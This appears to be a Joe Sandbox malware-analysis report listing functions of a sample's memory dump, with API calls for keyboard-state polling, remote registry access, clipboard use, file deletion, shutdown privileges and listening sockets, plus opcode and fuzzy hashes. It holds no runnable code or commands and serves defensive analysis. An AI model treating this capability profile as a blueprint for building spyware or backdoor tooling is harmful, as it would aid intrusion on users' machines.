Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 647839c1157d7fbb8375c7b825f307b9a7c1ff7a4b83eb0cdef41ea1ef6ebfe3
Instruction ID: 5c15f40f6ad42e5ab478ea61d2a6fab549e34a9f9023dcbe335bfb48a56750e6
Opcode Fuzzy Hash: 647839c1157d7fbb8375c7b825f307b9a7c1ff7a4b83eb0cdef41ea1ef6ebfe3
Instruction Fuzzy Hash: D3615D75904219AFDF04DFA4EC84AEEBB79FF44301F048269F925A7291DB319A16CB60

Function 00BE66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

LF), xrefs: 00C212A4
ANY), xrefs: 00C212DE
UTF16), xrefs: 00C210CF
ANYCRLF), xrefs: 00C212FB
CR), xrefs: 00C21287
UTF), xrefs: 00C210FA
BSR_ANYCRLF), xrefs: 00C2131E
NO_AUTO_POSSESS), xrefs: 00C2112E
LIMIT_RECURSION=, xrefs: 00C211FC
BSR_UNICODE), xrefs: 00C21338
NO_START_OPT), xrefs: 00C2114F
CRLF), xrefs: 00C212C1
LIMIT_MATCH=, xrefs: 00C21170
UCP), xrefs: 00C2110D

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 9b8b1316bed76060e56577cca8467251effca670c15e12b473cc2822343d9564
Instruction ID: a1696b015e36cbb2de4a367947dddd4ff69a2a48fb45405f950d5093bc97bc99
Opcode Fuzzy Hash: 9b8b1316bed76060e56577cca8467251effca670c15e12b473cc2822343d9564
Instruction Fuzzy Hash: 83727075E00269DBDB14CF59D8807AEB7F5FF58350F2481AAE819EB690D7309E81CB90

Function 00C3001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C30097
SetKeyboardState.USER32(?), ref: 00C30102
GetAsyncKeyState.USER32(000000A0), ref: 00C30122
GetKeyState.USER32(000000A0), ref: 00C30139
GetAsyncKeyState.USER32(000000A1), ref: 00C30168
GetKeyState.USER32(000000A1), ref: 00C30179
GetAsyncKeyState.USER32(00000011), ref: 00C301A5
GetKeyState.USER32(00000011), ref: 00C301B3
GetAsyncKeyState.USER32(00000012), ref: 00C301DC
GetKeyState.USER32(00000012), ref: 00C301EA
GetAsyncKeyState.USER32(0000005B), ref: 00C30213
GetKeyState.USER32(0000005B), ref: 00C30221

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 6d0e16e387056f993b8959a869cc0e2cb07e03ca9c107b3a429abbbc653364a8
Instruction ID: e5c29c2e9ac5c4de22760bdccd1582f931141513a2070c36a560ea3e641314cf
Opcode Fuzzy Hash: 6d0e16e387056f993b8959a869cc0e2cb07e03ca9c107b3a429abbbc653364a8
Instruction Fuzzy Hash: 2B510A3291478829FB39DBB488647EEBFB49F01380F18459EC9D2575C3DAA49B8CC761

Function 00C503DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4FDAD,?,?), ref: 00C50E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C504AC

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C5054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C505E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C50822
RegCloseKey.ADVAPI32(00000000), ref: 00C5082F

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 162ffe88eaa300a9ab01a2a2028c55025a5bc99b56062ee48d067c285e937180
Instruction ID: 7090915d1dc239114778f35e2d09373b5550d89c7b7eebf5171fe73a6adb870a
Opcode Fuzzy Hash: 162ffe88eaa300a9ab01a2a2028c55025a5bc99b56062ee48d067c285e937180
Instruction Fuzzy Hash: B5E16F35604200AFCB14DF29C891E2ABBE4FF89714F14856DF85ADB2A2DB30ED45CB95

Function 00C44164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C4418B
EmptyClipboard.USER32 ref: 00C44191
GlobalAlloc.KERNEL32(00000002,?), ref: 00C441A6
CloseClipboard.USER32 ref: 00C44245

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 175f0918f19d23bc0c6c9ff6c164784f64691283b00ae043578662d317596e6f
Instruction ID: 0a4d84e705872663b8dc6d5a94e0b4c4bfefe2ac088c09b146b257ab8dfc67ed
Opcode Fuzzy Hash: 175f0918f19d23bc0c6c9ff6c164784f64691283b00ae043578662d317596e6f
Instruction Fuzzy Hash: 0521C4792006109FDB18AF24EC19B6E7BA8FF14751F10806AF946EB2B1DF70AD41CB54

Function 00C337EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD4743,?,?,00BD37AE,?), ref: 00BD4770

Part of subcall function 00C34A31: GetFileAttributesW.KERNEL32(?,00C3370B), ref: 00C34A32

FindFirstFileW.KERNEL32(?,?), ref: 00C338A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C3394B
MoveFileW.KERNEL32(?,?), ref: 00C3395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C3397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C3399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C339B9

Strings

\*.*, xrefs: 00C3384E, 00C33857, 00C3386C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 654fbb78d35239ad07af23b747503c3addb01db02c46e7d7ba6b9b48b2eb65bf
Instruction ID: ecd59bb0e2d236e9191f4e417a0ef953b7cc17777d35d989a2eae3157dc3cead
Opcode Fuzzy Hash: 654fbb78d35239ad07af23b747503c3addb01db02c46e7d7ba6b9b48b2eb65bf
Instruction Fuzzy Hash: 5B51943181528C9ACF15FBA4DD92AEDB7B9AF10301F6001AAE41577291FF316F09CB61

Function 00C3F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C3F440
Sleep.KERNEL32(0000000A), ref: 00C3F470
_wcscmp.LIBCMT ref: 00C3F484
_wcscmp.LIBCMT ref: 00C3F49F
FindNextFileW.KERNEL32(?,?), ref: 00C3F53D
FindClose.KERNEL32(00000000), ref: 00C3F553

Strings

*.*, xrefs: 00C3F425

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 6ea72752897bc908ddde010511f324857756f4dd71b181c89d61bd61b155be39
Instruction ID: ddd71833ba128b15c79470f63c3ec71d22236f1963bda6f2665ec103b77b84b4
Opcode Fuzzy Hash: 6ea72752897bc908ddde010511f324857756f4dd71b181c89d61bd61b155be39
Instruction Fuzzy Hash: 6A414C75D1021E9FCF14EF64DC55AEEBBB4FF15310F1444AAE815A3291EB309A86CB50

Function 00BE5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BE58A5
_memmove.LIBCMT ref: 00BE58F5
_memmove.LIBCMT ref: 00BE595B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9725c4d9a227ae3c36d5432287fa2f3350774f8be024eed2e56dd4efcc738c25
Instruction ID: 7818b3ef53303e4a53c1257bc05a5f50541d9aab310fd43e5c012cafa4b5d04f
Opcode Fuzzy Hash: 9725c4d9a227ae3c36d5432287fa2f3350774f8be024eed2e56dd4efcc738c25
Instruction Fuzzy Hash: 0C129970A00619DFCF14DFA5D981AEEB7F5FF48304F2045AAE806E7292EB35A915CB50

Function 00C33B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD4743,?,?,00BD37AE,?), ref: 00BD4770

Part of subcall function 00C34A31: GetFileAttributesW.KERNEL32(?,00C3370B), ref: 00C34A32

FindFirstFileW.KERNEL32(?,?), ref: 00C33B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C33BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C33BEA
FindClose.KERNEL32(00000000), ref: 00C33C01
FindClose.KERNEL32(00000000), ref: 00C33C0A

Strings

\*.*, xrefs: 00C33B5B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: f5ef9c9f927db937a873ae8260332f59d2669b90bf0143234490396b4f3933b2
Instruction ID: 5544b5ebe599a5d5a866b6d1b11cac04bd45b285ba8067424803b000891a7b13
Opcode Fuzzy Hash: f5ef9c9f927db937a873ae8260332f59d2669b90bf0143234490396b4f3933b2
Instruction Fuzzy Hash: 83317E350183859BC305EF24D8919EFF7E8AE91304F444E6EF4E5922A1FB25DA09CB67

Function 00C351BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C2882B
Part of subcall function 00C287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C28858
Part of subcall function 00C287E1: GetLastError.KERNEL32 ref: 00C28865

ExitWindowsEx.USER32(?,00000000), ref: 00C351F9

Strings

SeShutdownPrivilege, xrefs: 00C351C9
, xrefs: 00C351E7
@, xrefs: 00C351EC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: f99d0f836a6e24a5e548df1b3b5f71e874b3852ae8d8497245afcba0d1b11c23
Instruction ID: caffd0289062e05917a57450230315c8ba7e122dd1df7e73dd5cbab875b6048f
Opcode Fuzzy Hash: f99d0f836a6e24a5e548df1b3b5f71e874b3852ae8d8497245afcba0d1b11c23
Instruction Fuzzy Hash: 830126357B17156BF72C6269AC8AFBF7268EB05741F240424F923E20D2DA525D0186A0

Function 00C46283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C462DC
WSAGetLastError.WSOCK32(00000000), ref: 00C462EB
bind.WSOCK32(00000000,?,00000010), ref: 00C46307
listen.WSOCK32(00000000,00000005), ref: 00C46316
WSAGetLastError.WSOCK32(00000000), ref: 00C46330
closesocket.WSOCK32(00000000,00000000), ref: 00C46344

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 9759628dc78f97cf8895760fef8ba1921bf62d0d0a43ee0a19c97fa960264805
Instruction ID: fe873680651ad1296a550be065baae4c2b7af1c9c62fc352edcad38d14736020
Opcode Fuzzy Hash: 9759628dc78f97cf8895760fef8ba1921bf62d0d0a43ee0a19c97fa960264805
Instruction Fuzzy Hash: 2921DD34600200AFCB10EF64C845B6EB7F9FF4A721F15816AE826A73E1CB70AD41DB52

Function 00BE5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00BF0DB6: std::exception::exception.LIBCMT ref: 00BF0DEC
Part of subcall function 00BF0DB6: __CxxThrowException@8.LIBCMT ref: 00BF0E01

_memmove.LIBCMT ref: 00C20258
_memmove.LIBCMT ref: 00C2036D
_memmove.LIBCMT ref: 00C20414

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: e9434356dbac4f423548489f4b44e112ba27daef8604c6e976f5d78e28b6b73b
Instruction ID: e1e5155f80a8ac22d0a47280cb125ed1d88dfaca87a7b06fcc4319c120f664db
Opcode Fuzzy Hash: e9434356dbac4f423548489f4b44e112ba27daef8604c6e976f5d78e28b6b73b
Instruction Fuzzy Hash: B4029070A00219DBCF14DF65D981ABEBBF5EF44300F6480AAE806DB256EB35DA54CB91

Function 00BD1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BD19FA
GetSysColor.USER32(0000000F), ref: 00BD1A4E
SetBkColor.GDI32(?,00000000), ref: 00BD1A61

Part of subcall function 00BD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BD12D8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 64e8b5bed7ec4e1881cd3d1d05bedcd94e6144b2814e8ca4b71f477425f17eb7
Instruction ID: 144c6c3b99ff9227a5159561b7b4317296f2942e91c74dca9e504055a903bca9
Opcode Fuzzy Hash: 64e8b5bed7ec4e1881cd3d1d05bedcd94e6144b2814e8ca4b71f477425f17eb7
Instruction Fuzzy Hash: 75A15A70106644BEE728EB2D4C98E7FA5DCDF41342B1409ABF522D13D6FA249E41E3B5

Function 00C3BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C3BCE6
_wcscmp.LIBCMT ref: 00C3BD16
_wcscmp.LIBCMT ref: 00C3BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00C3BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C3BD6C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: d7d22c2f6fdf50ca4b0ea764fe4423968e5fa36a48191e5a8b52514a21756399
Instruction ID: d795b0b2d0239077f8b38553db2a3c2e4fa98c0ba493951ff3f09df50303838a
Opcode Fuzzy Hash: d7d22c2f6fdf50ca4b0ea764fe4423968e5fa36a48191e5a8b52514a21756399
Instruction Fuzzy Hash: 26519D796046029FC718DF28C491EAAB3E4FF49720F10466EFA66873A1DB30ED05CB91

Function 00C46747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C47D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C47DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C4679E
WSAGetLastError.WSOCK32(00000000), ref: 00C467C7
bind.WSOCK32(00000000,?,00000010), ref: 00C46800
WSAGetLastError.WSOCK32(00000000), ref: 00C4680D
closesocket.WSOCK32(00000000,00000000), ref: 00C46821

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: e3ea163191ffd5f6f76dd566d89ed865827ebdd10b3e258781637f64a083b709
Instruction ID: e602cf32ac0cc80d9d32726259137354be82f90905bb80c48b11077eec706e44
Opcode Fuzzy Hash: e3ea163191ffd5f6f76dd566d89ed865827ebdd10b3e258781637f64a083b709
Instruction Fuzzy Hash: AB41D475A006106FDB10BF64CC86F2EB7E8EF05B54F0484ADF919AB3C2EA709D019791

Function 00C55376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C553C5
IsWindowEnabled.USER32 ref: 00C553D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00C553E0
IsIconic.USER32 ref: 00C553EE
IsZoomed.USER32 ref: 00C553FC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 0ca65fe1ee9b9c889113803f845d20e11ef0fbbcf80f12d2218e2d8b4d801a87
Instruction ID: c08f35f289b79214172de3fd1aea126110bb92338c66a43565f8d1e1cd6cbe50
Opcode Fuzzy Hash: 0ca65fe1ee9b9c889113803f845d20e11ef0fbbcf80f12d2218e2d8b4d801a87
Instruction Fuzzy Hash: F61108393006115FD7216F26DC54B1EBB98EF447A2B404039FC59D3251DB70DD8286A8

Function 00C280A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C280C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C280CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C280D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C280E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C280F6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

